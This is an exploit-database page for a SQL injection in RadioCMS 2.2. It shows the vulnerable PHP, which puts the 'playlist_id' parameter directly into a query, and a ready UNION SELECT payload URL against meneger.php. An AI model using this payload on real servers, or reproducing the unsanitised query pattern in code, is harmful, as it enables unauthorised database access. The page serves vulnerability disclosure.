header-logo
Suggest Exploit
vendor:
RadioCMS
by:
Rooster(XEKA)
9
CVSS
HIGH
SQL Injection
89
CWE
Product Name: RadioCMS
Affected Version From: 2.2
Affected Version To: 2.2
Patch Exists: NO
Related CWE: N/A
CPE: a:radiocms:radiocms:2.2
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

RadioCMS 2.2

A SQL injection vulnerability exists in RadioCMS 2.2, which allows an attacker to execute arbitrary SQL commands via the 'playlist_id' parameter in the 'meneger.php' script. An attacker can exploit this vulnerability by sending a malicious HTTP request to the vulnerable server, such as http://server/radio/meneger.php?fold=/var/www/music&search=1%27&playlist_id=&playlist_id=-1+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12.

Mitigation:

Ensure that user input is properly sanitized and validated before being used in SQL queries.
Source

Exploit-DB raw data:

#################################################
+
+ Title: RadioCMS 2.2
+ Author: Rooster(XEKA)
+ Greetz to: Isis,luz3r,slider
+ Contact: forum.xeksec.com
+
#################################################
  
--[ Vuln Code ] --
  
...
if ($_GET['playlist_id']) {
  $playlist_id_get = ['playlist_id'];
}
...
if ($playlist_id != "") {
$query = "SELECT * FROM `playlist` WHERE $playlist_id;";
...
 
  
################################################
  
--[ Exploitable ]--
  
http://server/radio/meneger.php?fold=/var/www/music&search=1%27&playlist_id=&playlist_id=-1+union+select+1,version%28%29,3,4,5,6,7,8,9,10,11,12
  
################################################